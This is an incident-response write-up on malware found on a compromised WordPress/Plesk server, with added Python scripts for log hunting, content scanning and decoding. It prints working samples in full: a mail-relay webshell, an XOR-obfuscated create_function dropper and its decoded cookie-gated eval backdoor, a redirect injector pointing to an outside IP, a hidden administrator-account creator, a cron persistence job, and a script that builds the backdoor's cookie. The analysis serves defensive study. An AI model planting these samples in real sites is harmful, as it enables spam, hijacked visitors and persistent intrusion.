Analyzing the malware on a compromised host
Host environment

    PHP Version 7.0.11
    disable_functions: exec, passthru, proc_open, shell_exec, system, popen, dl
    crontabs-1.10-33.el6.noarch
    Linux cross.dev 2.6.32-754.14.2.el6.x86_64 #1 SMP Tue May 14 19:35:42 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
    CentOS release 6.6 (Final)
    Server version: Apache/2.2.15 (Unix)
    Plesk Product version: 12.0.18 Update #101
Malicious processes found (ps aux output)

    USER       PID %CPU %MEM     VSZ   RSS TTY STAT START  TIME COMMAND
    apache   38715  0.3  0.2 1958144 69272 ?   Ss   09:31  0:00 sid -DFOREGROUND
    apache   45368  7.8  0.0  139672  8804 ?   Ss   14:50  7:51 selix
    apache   50910  0.3  0.0  138192  5480 ?   Ss   16:26  0:00 selix
While they are still running, strace or lsof shows what each process is doing:

    strace -p <pid>
    lsof -p <pid>
Working back from the process start time (09:31), search access_log and access_ssl_log for requests around that moment.
The likely hit: GET //wp-content/themes/news-box-lite/httpd.pl
There were also many POST /wp-content/themes/news-box-lite/ocqwjyrrl.php requests (and a pile of POST /xmlrpc.php).
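The pivot just described, from the process start time in ps back into the access log, as an added Python example that is not part of the original write-up. The log lines are constructed in Apache combined format and modelled on the requests named above; the client addresses, the date and the rule names are invented. The script parses the log, flags direct requests to scripts under wp-content (POSTs, non-PHP scripts, random-looking file names), counts xmlrpc.php bursts per client, and lists everything requested within a few minutes of the 09:31 process start.

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# Constructed sample in Apache combined-log format, modelled on the requests named in this
# write-up. The client addresses and the date are invented; the paths are the ones observed.
SAMPLE_LOG = """\
198.51.100.23 - - [17/May/2019:09:12:01 +0800] "GET /wp-login.php HTTP/1.1" 200 3140 "-" "Mozilla/5.0"
203.0.113.7 - - [17/May/2019:09:30:52 +0800] "GET //wp-content/themes/news-box-lite/httpd.pl HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [17/May/2019:09:31:05 +0800] "POST /wp-content/themes/news-box-lite/ocqwjyrrl.php HTTP/1.1" 200 7 "-" "Mozilla/5.0"
203.0.113.7 - - [17/May/2019:09:31:06 +0800] "POST /wp-content/themes/news-box-lite/ocqwjyrrl.php HTTP/1.1" 200 7 "-" "Mozilla/5.0"
198.51.100.23 - - [17/May/2019:09:31:40 +0800] "GET /wp-content/themes/news-box-lite/style.css HTTP/1.1" 200 20411 "-" "Mozilla/5.0"
192.0.2.9 - - [17/May/2019:14:49:10 +0800] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
192.0.2.9 - - [17/May/2019:14:49:11 +0800] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
192.0.2.9 - - [17/May/2019:14:49:12 +0800] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
198.51.100.23 - - [17/May/2019:14:50:30 +0800] "GET /index.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# A script requested directly from inside wp-content. Theme and plugin files are included by
# WordPress, not fetched by browsers, so a direct POST to one is already odd.
WPCONTENT_SCRIPT = re.compile(
    r'^/+wp-content/(themes|plugins|uploads)/[^/]+/(?P<name>[^/]+)\.(?P<ext>php|pl|cgi)$'
)
# Real theme files that scanners probe for; excluded from the random-name heuristic.
KNOWN_NAMES = {'index', 'functions', 'header', 'footer', 'single', 'page',
               'sidebar', 'comments', 'search', 'archive', '404'}


def parse_log(text):
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec['when'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
        records.append(rec)
    return records


def looks_random(name):
    """Vowel-starved names of 8+ letters (ocqwjyrrl) are unlike anything a theme author writes."""
    letters = [c for c in name.lower() if c.isalpha()]
    if len(letters) < 8:
        return False
    return sum(c in 'aeiou' for c in letters) / len(letters) < 0.2


def reasons_for(rec):
    m = WPCONTENT_SCRIPT.match(rec['path'])
    if not m:
        return []
    reasons = []
    if rec['method'] == 'POST':
        reasons.append('POST to a script under wp-content')
    if m.group('ext') != 'php':
        reasons.append('non-PHP script under wp-content')
    if m.group('name') not in KNOWN_NAMES and looks_random(m.group('name')):
        reasons.append('random-looking filename')
    return reasons


def hunt(text):
    """(time, ip, method, path, reasons) for every request that trips at least one rule."""
    return [(r['when'].isoformat(), r['ip'], r['method'], r['path'], reasons_for(r))
            for r in parse_log(text) if reasons_for(r)]


def xmlrpc_bursts(text, threshold=3):
    """Clients POSTing to xmlrpc.php at least `threshold` times: brute force or pingback abuse."""
    counts = Counter(r['ip'] for r in parse_log(text)
                     if r['method'] == 'POST' and r['path'] == '/xmlrpc.php')
    return {ip: n for ip, n in counts.items() if n >= threshold}


def around(text, center, minutes=5):
    """Everything requested within +/- `minutes` of a process START time taken from ps."""
    window = timedelta(minutes=minutes)
    return [r for r in parse_log(text) if abs(r['when'] - center) <= window]


# START column of the `sid -DFOREGROUND` process in the ps listing, placed on the constructed log date.
PROCESS_START = datetime(2019, 5, 17, 9, 31, tzinfo=timezone(timedelta(hours=8)))

if __name__ == '__main__':
    for hit in hunt(SAMPLE_LOG):
        print(hit)
    print(xmlrpc_bursts(SAMPLE_LOG))
    for r in around(SAMPLE_LOG, PROCESS_START):
        print(r['ts'], r['ip'], r['method'], r['path'])
```

On a real host, feed it the concatenation of access_log and access_ssl_log (and the rotated copies, since the first dropper request may predate the process you noticed by days) and widen the window until the first request from the same client appears.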
news-box-lite holds a pile of randomly named php files such as ocqwjyrrl.php.
They all have the same content:

    <?php
    $jewrqwbnlk = base64_decode($_POST['ylxqjqbcn']);     // recipient
    $xaouf = base64_decode($_POST['nrsf']);                // subject
    $jwgpxlzblkepa = base64_decode($_POST['tdluhqtnmzr']); // message body
    $fcublsqtpae = base64_decode($_POST['qqifquaqdzvp']);  // additional headers (From:, etc.)
    $jfnbrsjfq = mail($jewrqwbnlk, $xaouf, $jwgpxlzblkepa, $fcublsqtpae);
    if ($jfnbrsjfq) { echo 'vwkxlpc'; } else { echo 'yfbhn : ' . $jfnbrsjfq; }

This is a mail relay: every POST sends one message through the server's MTA, with recipient, subject, body and extra headers base64-encoded in randomly named POST fields; the two odd strings echoed back are the success and failure tokens the sender's client checks. Nothing in the file is reused between samples except the mail() call and the base64_decode($_POST[...]) shape, which is what a content scan has to key on.
In other words, they all came in through WordPress (the files are owned by the apache user, or by the vhost's user).
The malicious processes run as the apache user but are not httpd; they give themselves names like pid, sid or selix, and `sid -DFOREGROUND` mimics the real `httpd -DFOREGROUND` command line. A process picks its own argv[0], so the ps COMMAND column is not proof of identity: `ls -l /proc/<pid>/exe` and `/proc/<pid>/cwd` show the binary actually running and where it was started from (a binary deleted after launch shows as `(deleted)`).
They make outbound connections to ports 25 and 53, so they are probably attacking SMTP or DNS, or sending spam (consistent with the mail relay above).
They also installed a job in /var/spool/cron/apache:

    */10 * * * * perl /var/tmp/obNAwDiLPa >/dev/null 2>&1
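A content scan for this family of files, as an added Python example that is not part of the original write-up. The corpus is constructed: MAILER_SHELL is the file found in news-box-lite (copied from above), DROPPER_STUB is the first two statements of the XOR dropper shown further down with a harmless body in place of its real second stage, and the eval shell and the benign template are invented for contrast. The rule names, the regexes and the verdict thresholds are mine; they look for attacker-controlled input being decoded (source), for mail()/eval()/create_function() (sinks), and for the string-XOR plus variable-function-call pattern that hides the sink's name.

```python
import re
from pathlib import Path

# Constructed corpus. MAILER_SHELL is the file from news-box-lite as shown in this write-up;
# DROPPER_STUB keeps the dropper's first two statements and swaps its second stage for 'return 1;';
# EVAL_SHELL and BENIGN_TEMPLATE are invented for contrast.
MAILER_SHELL = r"""<?php $jewrqwbnlk = base64_decode($_POST['ylxqjqbcn']); $xaouf = base64_decode($_POST['nrsf']); $jwgpxlzblkepa = base64_decode($_POST['tdluhqtnmzr']); $fcublsqtpae = base64_decode($_POST['qqifquaqdzvp']); $jfnbrsjfq = mail($jewrqwbnlk, $xaouf, $jwgpxlzblkepa , $fcublsqtpae); if($jfnbrsjfq){echo 'vwkxlpc';} else {echo 'yfbhn : ' . $jfnbrsjfq;}"""
DROPPER_STUB = r"""<?php $ZrbHHby='::H1 E5UHT0=. -'; $ISrLPIE='YH-PT j3=:SIGOC'^$ZrbHHby; $mFDvwn=$ISrLPIE('', 'return 1;'); $mFDvwn();"""
EVAL_SHELL = r"""<?php @eval(base64_decode($_REQUEST['c']));"""
BENIGN_TEMPLATE = r"""<?php get_header(); if ( have_posts() ) { while ( have_posts() ) { the_post(); the_content(); } } get_footer();"""

RULES = {
    # source: request data base64-decoded straight out of a superglobal
    "decoded-input": re.compile(r"base64_decode\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b"),
    # sinks: attacker data becomes outbound mail or executable code
    "mail-sink":     re.compile(r"\bmail\s*\("),
    "code-sink":     re.compile(r"\b(eval|create_function|assert)\s*\("),
    # a quoted literal XORed with a variable or another literal: a name or code built at runtime
    "string-xor":    re.compile(r"(['\"])[^'\"]*\1\s*\^\s*(\$\w+|['\"])"),
    # a variable used as a function: $x('', ...) or $x()
    "dynamic-call":  re.compile(r"\$\w+\s*\(\s*(['\"]|\$|\))"),
}


def scan_php(src: str) -> list:
    """Names of the rules that fire on one file's source, sorted for stable output."""
    return sorted(name for name, rx in RULES.items() if rx.search(src))


def verdict(hits: list) -> str:
    """Combine hits into a call; a lone sink is only a review item, a source reaching a sink is not."""
    hits = set(hits)
    if "decoded-input" in hits and hits & {"mail-sink", "code-sink"}:
        return "webshell: request data reaches a sink"
    if "string-xor" in hits and "dynamic-call" in hits:
        return "dropper: runtime-built function name is called"
    if "code-sink" in hits:
        return "review: code sink present"
    return "clean"


def scan_tree(root: str) -> dict:
    """Walk a document root and report every .php file that is not clean."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        src = path.read_text(encoding="utf-8", errors="replace")
        v = verdict(scan_php(src))
        if v != "clean":
            findings[str(path)] = v
    return findings


if __name__ == "__main__":
    for label, src in [("mailer", MAILER_SHELL), ("dropper", DROPPER_STUB),
                       ("eval", EVAL_SHELL), ("benign", BENIGN_TEMPLATE)]:
        print(f"{label:8} {scan_php(src)} -> {verdict(scan_php(src))}")
```

Run scan_tree() against httpdocs/ of every Plesk vhost on the box, not just the one where the processes were seen; the mailer's randomised variable and field names defeat hash- or string-based signatures, which is why the rules match shapes rather than names.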
/var/spool/cron/apache was apache:apache at the time; I changed it to chown root:root and chmod 400 and removed the perl job, but it still got changed back to apache:apache (and the job was scheduled again) (perhaps some core/kernel component was compromised).
These artefacts (the cron job and the apache-owned processes) were probably set up by the GET /wp-content/themes/news-box-lite/httpd.pl request, but httpd.pl had already been deleted, so its contents are unknown.
One of the many malicious scripts:
<?php $ZrbHHby='::H1 E5UHT0=. -'; $ISrLPIE='YH-PT j3=:SIGOC'^$ZrbHHby; $PcifgM='0Vme,6;69TU9e+.S1G6ymAT>2W979sn=,5wLXAECa, ,.,iaTlO=Ks1U;cg0RdR:XCL=RblZS qeSzonq3RXKEPGF>O kyibDXJfmb=4I7xJBXJ9BVi=SJ5=+m-SYHPtWAAXWuhp-<;=SHXlfls:HboLM>M2JbtjQ=P.64SLg-BMpCe..7 bdmrO 9,RB6 =H-lX594UWY k2WOZeU6DWbvgQ0X;IEQHYO8JJkRA+456b.=:hmzaYTkH1M8Vtwid0B SJ69 36W9ZG;=pr< NMXmu0-N+xWwWsGA=sRMU2I-nE,1IlokZdWkuZ TvreROqb -Dpq0u5kHreUetqnUobQ+dzdpgNJ09,KrZY>a X-:;EjBD9K+ A3mxcqPJ 7aEAPbyqG=MlW8,VMwJ =5lw5 B 6 m>OY>fP6 8bjear0xHH CM< vPM7aku4mploq3hd8exm3zx4bqkEXAno'; $mFDvwn=$ISrLPIE('', 'Y0EDJCUUM=:W:NV:B3EQJ9;Lm3XCX,1PYAPeqa>IhJUR65QYNK=RR8+A,753U-IIiSTEJGZUP3OSRORHd.pksP;;6WwPVaZs:eH-7qB:TEIgaHuSP:<N.7RyJJS< AtRV MJK>kkE ,MptVUBqZMZM2E=1ockWZ0B8CYrArI,1 X<JH16YX8zAegxA7,>7>obQ:TBBck9R7lgFYU=VXwb>+U13R7w.TIJ2F6 hmT1 -+2NbzKSIX2+0LNH,ys:z.7HAGRT2E TUuWF.P>C+KGOxpST6O7=XX3XSSbRX.JaaT1;5RqIYaG-4E.Te1gyTFYPwOH.D8EmOOjF<1 2P,OPM4nuc1 61X,Hau1EYwrDCA:A ;+CIAfN<m6QLP6KV.NNUu,,GshfEiZ,F+BIJuK1BCQhFnPH0zIAJOCABYM2:NJI +WLT2HD ZKk16-A4m::.M7W72TB85U;T- yl=.L+cGreOUAW=EXCADAk02ClU,L7TQODQ0R23iREJi2A34ONXUWE7jtMQTL:JQwQqSo,YFzi1S=L5bGT0K2BzYjKR9FmBFTd-BVFOtEBQGWSqAQbRCGX3XQhJCSDVAn+BKM2-1E DIO6Be4X2GO WJTCU4+TVHlapBYQgFGe2NM:eS.AIT7PEA;LOWDJcfb4o5NILJZLZxMr-+H,eQDCx STCQk>5>94a3Fp1,=l27g6S6lqhUe'^$PcifgM); $mFDvwn();
Looking only at `$mFDvwn = $ISrLPIE('', XXX); $mFDvwn();` it is not obvious how this executes anything; it looks like it merely echoes a string.
The trick is the ^ operator: applied to two strings, PHP XORs them byte by byte (https://www.php.net/manual/en/language.operators.bitwise.php), and 'YH-PT j3=:SIGOC' ^ '::H1 E5UHT0=. -' evaluates to the string create_function (https://www.php.net/manual/en/function.create-function.php). So $ISrLPIE('', ...) is really create_function('', <second stage>), which compiles the XOR-decoded second literal into an anonymous function, and $mFDvwn() then runs it. Neither create_function nor eval appears literally in the file, which is what lets it slip past a grep for the usual keywords.
Two caveats for the environment above: create_function is an ordinary function and could have been listed in disable_functions, but this host's list only covers exec, passthru, proc_open, shell_exec, system, popen and dl; eval itself is a language construct and cannot be disabled that way at all. create_function was deprecated in PHP 7.2 and removed in 8.0, so this loader only works on older PHP such as the 7.0.11 installed here.
Decoded with https://www.unphp.net/decode/5913a97d362273e62447aa6654ab3071/ it becomes:

    <?php
    if (!function_exists('xor_data__mut')) {
        // Repeating-key XOR; the same routine both encodes and decodes.
        function xor_data__mut($data, $key) {
            $out = '';
            for ($i = 0; $i < strlen($data); $i++)
                $out .= ($data[$i] ^ $key[$i % strlen($key)]);
            return ($out);
        }
    }
    // Take the LAST cookie (name and value); fall back to the last GET/POST/COOKIE parameter.
    $data = false;
    $data_key = false;
    foreach ($_COOKIE as $key => $value) {
        $data_key = $key;
        $data = $value;
    }
    if (!$data) {
        foreach ($_REQUEST as $key => $value) {
            $data_key = $key;
            $data = $value;
        }
    }
    // The parameter NAME is the XOR key for its own VALUE, so no fixed parameter name appears in traffic.
    $data = @unserialize(xor_data__mut(base64_decode($data), $data_key));
    // Only a caller who knows the key hashing to cf94... gets code execution; others fall through.
    if ($data && array_key_exists('key', $data)
        && (md5($data['key']) == 'cf94416b34fb053a2b893477766f739a')
        && array_key_exists('payload', $data)) {
        eval($data['payload']);
        exit(0);
    }
    // Anyone else gets a host-derived token, presumably so the operator can check the shell is alive.
    echo (md5(md5($_SERVER["HTTP_HOST"])));

It is a password-gated eval backdoor: the operator sends one cookie whose name is the XOR key and whose value is base64(xor(serialize(['key' => ..., 'payload' => ...]))). Because any cookie or parameter name works, there is no fixed string to signature on in the request; the only constants are in the file itself.
A create_function example:

    $f = create_function('$name', 'echo "Hello ".$name;');
    $f('World');   // prints Hello World

is roughly equivalent to

    function fname($name) { echo "Hello ".$name; }
    fname('World');

The first argument is the parameter list and the second is the function body, both passed as strings, so whatever is in the second string is compiled and run just as eval() would do it; in the dropper above, that second string is the XOR-decoded second stage.
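The two mechanisms above in Python, as an added example that is not part of the original post or of the malware: php_string_xor reproduces PHP's string ^ on the dropper's two literals to recover the function name, and xor_data_mut plus a minimal PHP serialize/unserialize for flat string arrays, build_cookie and shell_receive reproduce the request the decoded shell expects and its server-side gate, without executing anything. The md5 hard-coded in the shell has no preimage on this page, so the demo uses a constructed key and derives that key's own hash to show the gate passing; the cookie name PHPSESSID and the payload text are likewise assumptions.

```python
import base64
import hashlib


def php_string_xor(a: str, b: str) -> str:
    """PHP's `$a ^ $b` on two strings: byte-wise XOR, truncated to the shorter operand."""
    return bytes(x ^ y for x, y in zip(a.encode("latin-1"), b.encode("latin-1"))).decode("latin-1")


# The two short literals from the dropper on this page; XORing them is how the script obtains a
# callable name without that name ever appearing in the file.
DROPPER_NAME = "YH-PT j3=:SIGOC"
DROPPER_KEY = "::H1 E5UHT0=. -"


def xor_data_mut(data: bytes, key: bytes) -> bytes:
    """Port of the decoded shell's xor_data__mut(): repeating-key XOR, key reused cyclically."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def php_serialize_assoc(items: dict) -> bytes:
    """Just enough of PHP serialize() for a flat string=>string array, which is all the shell reads."""
    body = b"".join(
        b's:%d:"%s";s:%d:"%s";' % (len(k.encode()), k.encode(), len(v.encode()), v.encode())
        for k, v in items.items()
    )
    return b"a:%d:{%s}" % (len(items), body)


def php_unserialize_assoc(raw: bytes) -> dict:
    """Inverse of the above; raises ValueError on anything that is not a flat string=>string array."""
    if not raw.startswith(b"a:"):
        raise ValueError("not a serialized array")
    pos = raw.index(b"{") + 1
    out = {}

    def read_string():
        nonlocal pos
        if raw[pos:pos + 2] != b"s:":
            raise ValueError("expected a string")
        colon = raw.index(b":", pos + 2)
        length = int(raw[pos + 2:colon])
        value = raw[colon + 2:colon + 2 + length]
        pos = colon + 2 + length + 2  # skip the closing quote and ';'
        return value.decode()

    while raw[pos:pos + 1] != b"}":
        key = read_string()
        out[key] = read_string()
    return out


def build_cookie(cookie_name: str, key: str, payload: str) -> str:
    """Operator side: the cookie NAME is the XOR key, the VALUE is base64(xor(serialize(...))).
    Any name works, so there is no fixed parameter for a WAF or IDS to key on."""
    blob = php_serialize_assoc({"key": key, "payload": payload})
    return base64.b64encode(xor_data_mut(blob, cookie_name.encode())).decode()


def shell_receive(cookies: dict, key_md5: str, http_host: str) -> tuple:
    """Server side as written in the decoded shell: the last cookie wins, it is decoded with its own
    name as key, and the payload is released only if md5(key) matches the hard-coded hash.
    Returns ("eval", payload) or ("beacon", md5(md5(host))) instead of executing anything."""
    data_key = data = None
    for name, value in cookies.items():
        data_key, data = name, value
    if data:
        try:
            fields = php_unserialize_assoc(xor_data_mut(base64.b64decode(data), data_key.encode()))
        except ValueError:  # covers binascii.Error and UnicodeDecodeError as well
            fields = None
        if fields and "key" in fields and "payload" in fields \
                and hashlib.md5(fields["key"].encode()).hexdigest() == key_md5:
            return ("eval", fields["payload"])
    return ("beacon", hashlib.md5(hashlib.md5(http_host.encode()).hexdigest().encode()).hexdigest())


# Hash hard-coded in the decoded shell. Its preimage is not on the page, so the demo uses a
# constructed key and that key's own hash to show the gate passing; PHPSESSID is an assumed cookie name.
PAGE_KEY_MD5 = "cf94416b34fb053a2b893477766f739a"
DEMO_KEY = "constructed-demo-key"
DEMO_KEY_MD5 = hashlib.md5(DEMO_KEY.encode()).hexdigest()

if __name__ == "__main__":
    print(php_string_xor(DROPPER_NAME, DROPPER_KEY))
    cookie = build_cookie("PHPSESSID", DEMO_KEY, "phpinfo();")
    print(cookie)
    print(shell_receive({"PHPSESSID": cookie}, DEMO_KEY_MD5, "cross.dev"))
    print(shell_receive({"PHPSESSID": cookie}, PAGE_KEY_MD5, "cross.dev"))
```

The round trip shows what actually crosses the wire: a single cookie with an arbitrary name and an opaque base64 value. The only detectable constants live in the file, so for this shell a content scan of the document root is more reliable than traffic inspection, and for the live host the beacon response md5(md5(Host)) to an otherwise empty request is a quick way to confirm which of the random-named files is this backdoor.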
There is also a file wp-data.php containing several base64-encoded blobs. Decoded, it does the following (each blob is prefixed with the marker m^r^ in the decoded output):

1. Scans for document roots: www, httpdocs, public_html and so on.

2. Writes an .htaccess. The rules are the stock WordPress permalink rewrite, so every request that is not an existing file or directory is funnelled through index.php:

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

3. Redirects visitors elsewhere. Only browsers whose User-Agent contains one of Chrome, Firefox, Edge, Opera, Android, Safari or Windows are affected; each visitor is marked with a two-day wp-authcookie-1 cookie so they are bounced only once; and anyone carrying wp-settings-time-1 (a cookie WordPress sets for the logged-in user with ID 1, usually the account created at install time) is skipped, so the site owner is unlikely to see the redirect. The chopped-up string concatenation assembles Location: http://134.249.116.78/?key= followed by a 32-character random token:

    <?php
    error_reporting(0);
    function a_($c_ = 32) {
        $c0 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
        $c1 = strlen($c0);
        $c2 = "";
        for ($c3 = 0; $c3 < $c_; $c3++) { $c2 .= $c0[rand(0, $c1 - 1)]; }
        return $c2;
    }
    $c4 = array("Chrome", "Firefox", "Edge", "Opera", "Android", "Safari", "Windows");
    foreach ($c4 as $c5) {
        if (stripos($_SERVER['HTTP_USER_AGENT'], $c5) !== false) {
            if (!isset($_COOKIE["wp-authcookie-1"]) && !isset($_COOKIE["wp-settings-time-1"])) {
                setcookie("wp-authcookie-1", "1", time() + 3600 * 24 * 2);
                header("L"."oc"."at"."io"."n: ht"."tp:"."//"."13"."4.2"."49."."11"."6.78"."/?"."ke"."y=" . a_());
            }
        }
    }
    ?>

4. Creates a WordPress administrator account (login wordcamp, password z43218765z, e-mail wordcamp@wordpress.com), giving the attacker a way back in even after the shells are removed:

    <?php
    $createuser = wp_create_user('wordcamp', 'z43218765z', 'wordcamp@wordpress.com');
    $user_created = new WP_User($createuser);
    $user_created->set_role('administrator');
    ?>